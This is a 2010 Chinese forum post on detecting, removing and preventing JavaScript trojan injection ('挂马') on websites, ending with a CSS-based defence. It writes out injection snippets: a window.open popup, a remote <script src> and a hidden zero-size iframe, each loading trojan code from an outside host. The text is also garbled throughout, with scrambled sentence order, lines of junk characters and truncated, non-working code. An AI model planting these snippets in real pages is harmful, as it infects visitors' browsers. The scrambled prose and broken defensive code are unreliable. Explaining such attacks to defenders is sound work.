搜索
查看: 11334|回复: 0

网站被JS挂马解决方法

[复制链接]
发表于 2010-11-10 08:17:49 | 显示全部楼层 |阅读模式

网站被JS挂马解决方法

4 N9 n |% k% }, r9 Z* F3 m2 n

为什么网页挂马还是屡见不鲜?这恐怕就要说一说 CSS 挂马了下面我详细讨论 虽然能够巧妙地利用 CSS 代码防范

& Q2 K o2 {. k6 u+ j% r& i' d$ o$ y

IFRAME 和 JS 脚本挂马。

: R) n3 O9 Q1 n$ ~ C

检测网页木马也是很重要的一项工作,目前流行的网站被黑,相应的 asp,

b* M0 f3 e! ~6 q' a( F: K

网站优化设计当中。htm,j 等文件中,插入以 js 调用方式的本文主要介绍网页挂马的种类、如何检测网页是否被挂马、

8 e+ i, w$ q1 B; [: P, ]

如何清除网页木马。如何防止网页被挂马。
1: 网页挂马的种类 .

1 l; K9 D0 {4 z3 w: N2 l

相应的 asp, 目前流行的网站被黑。htm,j 等文件中,插入以 js 调用方式的

4 `9 x3 e+ U8 _- h" H( H

卢松松以前做过的极品源码下载站 ’ 就遇到过 JS 挂马

5 s: `! I, q) ^* @

利用动网程序漏洞 ( 上传附件漏洞 ) 拥有网站管理员权限。删了论坛几千条数据 , 校园闹翻天论坛 ’ 就遇到用户提权

( e/ [7 w& I( B) b8 J5 l) G

。一千多位会员的 ID

8 B$ |9 \, i5 z/ V5 D+ p- ^

2: 如何检测网页是否被挂马。

3 `7 O9 W0 b! h2 q- O8 r

六款免费网页平安检测工具横向测评 ( 华军软件园 )
1 专业检测工具。>

7 P: @& l% `2 g( _, ?, I H

或者可以利用 Googl 搜索你网站、博客进行检测。如果有网站有木马则 googl 会在搜索列表的下方提示该网站有不安全

: _2 w) s3 W. O! n- r

因素。
2 googl 检测。>

8 ]" E; L9 w7 R! e

常用的杀毒软件也可以检测出来。
3 杀毒软件检测。>

" N B7 V; H& B- O) r/ \, ~* q

打开你网站、博客,
4 人工检测。点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

9 p! Z" {, U6 u8 ]- s

5 使用 McAfee SiteAdvisor 平安浏览网页的插件。

* b6 T5 b9 |' Z. B

4 n$ z" I s# Y' t3 \7 _4 s" X/ ?

3: 如何清除网页木马。

# o8 e2 A. `, n3 [& j9 t( P

就看那些文件是最近修改过的主要检查这些新文件, 一旦中了网页木马。从 FTP 中可以检查文件最近修改时间。然后进

$ V+ M" \1 r2 d4 R% r

入源文件把相关的网页挂马种类的可疑代码删除。

8 l; s: y% n. x% H6 E

建议删除所有文件 ( 数据库、图片、文档、顺序模板主题等文件夹可以保留 ) 如果你对你所使用的网站、博客程序不熟

! d2 q1 F% I7 K3 u& a

悉。>

7 h; s* {$ ^! C, \/ e

请从预防开始吧。
4: 如何防止网页被挂马。如果你网站还没有被挂马。>

/ N8 ~( p8 D/ s& M6 V' q8 ]

并只允许信任的人使用上传程序。
1 对网友开放上传附件功能的网站一定要进行身份认证。>

: k. q8 L+ w, ]) B1 Y1 O6 a9 a

2 保证你所使用的顺序及时的更新。

" \( ]$ d5 a7 m

3 不要在前台网页上加注后台管理程序登陆页面的链接。

) e- L6 p/ s/ }0 Q1 F8 D0 t

但不要把备份数据库放在顺序默认的备份目录下。
4 要时常备份数据库等重要文件。>

1 M" K* J! P d

不能过于简单。
5 管理员的用户名和密码要有一定复杂性。>

- T6 D$ N7 W9 z8 Q' M$ Z" i

二项功能组合,
6 IIS 中禁止写入和目录禁止执行的功能。可以有效的防止 ASP 木马。

) V( v6 j+ B3 ~6 ^6 l3 T% V6 C8 c

设置执行权限选项中,
7 可以在服务器、虚拟主机控制面板。直接将有上传权限的目录,取消 ASP 运行权限。

" Q" h, P# s7 Q( ]

8 创建一个 robots.txt 上传到网站根目录。 Robot 能够有效的防范利用搜索引擎窃取信息的骇客

}3 [8 Y3 m- A% ?8 M/ t4 v

; f' o; `' h* L

IFRAME 挂马比较早, < IFRAME 挂马比较早。相应的预防措施也比较多,其中用 CSS 配合 JS 脚本进行预防是主流方式

; ]0 N$ ^; E! k" |+ M: x6 B

。可这种预防方式也存在平安隐患, JS 脚本也可以被用来挂马,令人防不胜防。下面要介绍反击 JS 挂马的方法。

8 G( n: K* ]: V! m

JS 挂马溯源

7 A3 Y9 m+ q: Y7 A; @

有经验的平安工程师也开始研究相应的对策,当 IFRAME 逐渐被黑客滥用的时候。一段时间内各种阻止 IFRAME 挂马的方

4 U2 h8 R$ Q% o

法不时涌现,其中通用性较高的就是利用 CSS 配合 JS 脚本防御 IFRAME 挂马。

* _" ?- R9 i. ]# c& J

很多网站都会让网页调用 JS 脚本来实现广告等诸多特效,而黑客也发现。如果将木马挂在 JS 脚本中,所有调用该 JS

2 c/ }* Z8 }$ ?3 y

脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此 JS 脚本挂马逐渐开始被黑客应用。

_# P, U) `9 x& t; ?

一种面向对象的脚本语言,小百科: JS 脚本是 JavaScript 脚本语言的简称。目前广泛用于动态网页的编程。需要提示

2 B# a" n) L) B2 K- ? u/ ~; N" v

大家的 JavaScript 和 Java 除了语法上有一些相似之处,以及都能够当作网页的编程语言以外,两者是完全不相干的而

/ g9 I$ f9 U2 M; E2 q

JavaScript 与 Jscript 也不同, Jscript 微软为了迎战 JavaScript 推出的脚本语言。

2 x( t3 u* u! o+ C/ Y- D/ `

但是 JavaScript 一门具有丰富特性的语言,虽然 JavaScript 作为给非程序人员的脚本语言向大众推广。有着和其他编

$ q) a# F1 p8 Z ^, ], S/ n! }& `: g

程语言一样的复杂性。实际上,必需对 JS 有扎实的理解才干用它来编写比较复杂的顺序,作为一名平安工程师,掌握 JS

7 i* y' |5 Z% F9 ]

脚本在工作中会有很大的协助。

: [* H4 e( `, Z

挂马原理一点通

' a( U4 |! e8 L

可以说优点多得数不过来, JS 脚本挂马对于黑客而言。首先 JS 脚本在挂马时可以直接将 JS 代码写在网页中,也可以

! w$ {: B; U+ o g- Z* `

通过注入网页,让网站远程调取异地 JS 脚本。此外, JS 挂马插入 Web 页面的方法有几十种,绝对够菜鸟们眼花缭乱,

9 }$ [) J& b, ]- _

无从区分木马在何处。

! W5 a& q5 m5 f" S

如同一个穿着鲜红颜色外衣的劫匪, IFRAME 挂马相对于安全工程师而言。招摇而扎眼,很容易被发现。但是利用 JS 挂

6 P0 m; i7 D/ {) ~% x& E

马就意味着这个劫匪拥有了一张可以随时变换的面孔,而且它还能够随时更换衣服。这样的劫匪在平安工程师搜查时,很

z- R, D' b6 n: Y, Q6 d

容易蒙混过关,导致木马久杀不绝。

7 S! R/ ? W' J2 D$ s

JS 挂马攻防实录

C# x8 G% n8 j2 C5 ~( H0 ]

一种是直接将 JavaScript 脚本代码写在网页中,攻现在最多见的 JS 挂马方法有两种。当访问者在浏览网页时,恶意的

+ H8 L$ ^+ E) Q/ ~% R

挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。

~$ |) {$ |! s6 ?% C

这种方法使用的关键代码如下:

. g1 J* k6 i2 B! |

"",  window.open "http://www.v404.cn/ 木马

- b0 x& |1 h0 r c( G* D. O

.html"."toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1" ;

6 e, @7 ]4 B1 y2 M+ K* h- l

& [; T0 O: f# r* v, F

很容易被安全工程师发现,这种代码往往很长。而且没有经验的黑客也喜欢将 “ width 和 “ height= 参数设为 “ 0

5 M: ~3 M2 P: s6 p0 f

但是设置为 0 后,可能会出现恶意代码不运行的情况。

! P: S9 v* T1 u) X( s

并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入: 另外一种 JS 挂马方式是黑客先将挂马脚本代码 “

/ {! Z( m. [1 r) v& B l

document.writ ' < Iframe src=" 网页木马地址 " ></ifram > ' 写入 Window 中的写字板另存为后缀为 .j 脚本文件

+ B$ U3 _8 n) H

I( ?/ v# [! B6 Q

<script src="http://www.v404.cn/ 木马脚本 .js"></script>

1 z# Z: M3 N1 J* i

4 J- S- M% ?9 R5 w4 G# x

或者

: B. b' y2 R1 U3 ?8 r7 L

document.writ "<div style='display:none'>"

; g9 v, f* t$ _ T# u

document.writ "<ifram src=" 网页木马地址 " width="0" height="0" scrolling="no" frameborder="0"></iframe>"

4 o% O6 j3 R5 g: F' k8 R: j5 L2 r2 w

document.writ "</div>"
 

) S5 _7 u& {3 r3 d; g! N' Q# y

, [" w. p$ X% q9 ^; f) m$ F

就成功地将木马挂到对方的网页中了

9 r7 [% C; T! m" {; ?

例如黑客有可能会将脚本写为: 小提示:黑客还可以根据情况随机变换拔出的 JS 挂马方法。

" o3 N b3 w3 n& a# \ z

<div style="behaviour: url http://www.v404.cn/ 木马脚本 .j ;">

6 p% {. L% m, K' a4 E- o

或者:

" |' L8 T4 L6 | @3 V

<ifram src="vbscript:[ 挂马脚本 ]">

- {# G. h* F0 [! d$ u

5 @( Y' T& {" W- h3 ~3 G


等等 …

0 h; b0 S e) P8 `2 k W5 ~3 m

不方便,防第一种 JS 挂马方式。用得非常少,而第二种 JS 挂马方式才是当前主流的所以我主要针对它进行防御。方法

% \8 z* Y% ~0 Y7 n* g- ^6 f

就是阻止 Src 请求的异地外域的 JS 脚本,代码如下:

U5 s n' X5 k" U% Z

iframe{mdy1:express this.src='about:blank', <  iframe{mdy1:express this.src='about:blank'.this.outerHTML=''

! Y9 E1 q! L q

;}

7 T" e; X s; S8 w2 [

script{mzm2:express this.src.toLowerCas .indexOf 'http' ==0 ?document.writ ' 木马被成功隔离 !' :'' ;}
 

4 b* \# n0 [/ d( ?7 E. n" C

8 @( Y2 u0 ]. z: { P. k3 V1 e

不过这种方法的缺点就是网站的访问者将不能看到被挂了 JS 木马的相关网页。

3 W5 v8 ?$ ?# M$ D

这段代码会让异地外域的 JS 文件在使用 document.writ 时,所以我为安全工程师提供了一段可以中止 JS 脚本运行的

4 U0 ]8 }3 n6 t$ `, J8 Z; J1 K9 V. k

CSS 代码。被 document.clos 强制关闭。这个时侯 JS 挂马的内容往往还没有来得及写完,只有局部被强制输出了

( V& x4 L7 A' Q% \3 ~

Writer 后面的内容再不会被写入访问者的电脑中,从而起到防范 JS 脚本挂马的作用。

# b3 a9 K8 \$ [" i' ~

<title> 让 JS 挂马中止的 CSS 代码 </title>

7 @/ q! I9 X! M6 n* E( o; W- i: o

<styl type="text/css" id="shudoo">

/ {. j% s0 k1 A# |+ U; _" W7 z

/*<![CDATA[*/

! h3 o$ _9 ?# l8 _% O, t3 \2 m! g

this.outerHTML='' ;iframe{mdy1:express this.src='about:blank'.}

0 S1 s) d# \) _% N+ c F

script{mzm2:express this.src.indexOf 'http' ==0 ?document.clos :'' ;}

$ r+ u: i3 n8 z0 k: K

/*]]>*/

& Y- s( e9 e6 B: {

</style>

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册帐号

本版积分规则

热议作品
精华帖子排行
精彩推荐

虾皮社区,成立十年了!

站长自己也搞不懂想做个什么,反正就是一直在努力的做!

Copyright © 2007-2019 xp6.org Powered by Discuz

QQ|Archiver|手机版|小黑屋|虾皮社区 鲁公网安备 37021102000261号 |网站地图
返回顶部 返回列表